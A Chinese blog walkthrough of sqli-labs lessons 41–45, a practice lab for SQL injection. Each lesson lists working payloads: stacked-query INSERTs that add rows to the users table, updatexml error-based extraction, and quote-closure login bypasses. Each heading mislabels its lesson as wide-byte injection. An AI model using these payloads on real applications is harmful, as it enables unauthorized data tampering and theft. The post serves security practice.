sqli-labs lesson41-45
创始人
2024-05-30 07:35:29
0
  1. lesson-41 宽字节注入

判断注入:

?id=1 and sleep(3)

插入数据:

?id=1;insert  into   users (username,password) values ('44','55');

或union select注入:

-1 union select 1,2,database()

2.lesson-42 宽字节注入

判断注入:

单引号注入

在username除无注入,被 mysqli_real_escape_string函数过滤了

插入数据:

login_user=admin&login_password=555';insert into  users (username,password) values ('55','44');-- +&mysubmit=Login

或报错注入:

login_user=admin&login_password=555' or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +&mysubmit=Login

3.lesson-43 宽字节注入

判断注入:

单引号括号注入

插入数据:

login_user=adn&login_password=555');insert into  users (username,password) values ('555','444');-- +&mysubmit=Login

或报错注入

login_user=a&login_password=aaa') or updatexml(1,concat(0x7e,(select database()),0x7e),1)-- +&mysubmit=Login

4.lesson-44 宽字节注入

判断注入

为单引号注入

没有报错,不可用盲注判断闭合符号,因为是登录时,查用户名和密码,都是不对的,and sleep(3),就不行了

login_user=aaaa&login_password=aa' or '1'='1&mysubmit=Login

闭合为什么不能用-- +,#,因为查的是登录的用户名和密码,是没有这一条数据的,看不出来是否登录成功

闭合还可以用or 1=1#

用or ' ,and '1'='1,and '都不行,or ' 和查询时的用户名和密码都是假的,所以没数据,and '和and '1'='1一样

插入数据:

login_user=aaaa&login_password=aa' ;insert into  users (username,password) values ('55a5','4a44'); or '1'='1&mysubmit=Login

盲注用不了,因为后面的 or '1'='1,闭合后为恒真

5.lesson-45 宽字节注入

判断注入:

单引号加括号

login_user=aaaa&login_password=aa') or ('1')=('1&mysubmit=Login

插入数据:

login_user=aaaa&login_password=aa') ;insert into  users (username,password) values ('55a5','4a44'); or ('1')=('1&mysubmit=Login

相关内容

热门资讯

监控摄像头接入GB28181平... 流程简介将监控摄像头的视频在网站和APP中直播,要解决的几个问题是:1&...
Windows10添加群晖磁盘... 在使用群晖NAS时,我们需要通过本地映射的方式把NAS映射成本地的一块磁盘使用。 通过...
protocol buffer... 目录 目录 什么是protocol buffer 1.protobuf 1.1安装  1.2使用...
在Word、WPS中插入AxM... 引言 我最近需要写一些文章,在排版时发现AxMath插入的公式竟然会导致行间距异常&#...
【PdgCntEditor】解... 一、问题背景 大部分的图书对应的PDF,目录中的页码并非PDF中直接索引的页码...
修复 爱普生 EPSON L4... L4151 L4153 L4156 L4158 L4163 L4165 L4166 L4168 L4...
Fluent中创建监测点 1 概述某些仿真问题,需要创建监测点,用于获取空间定点的数据࿰...
educoder数据结构与算法...                                                   ...
MySQL下载和安装(Wind... 前言:刚换了一台电脑,里面所有东西都需要重新配置,习惯了所...
MFC文件操作  MFC提供了一个文件操作的基类CFile,这个类提供了一个没有缓存的二进制格式的磁盘...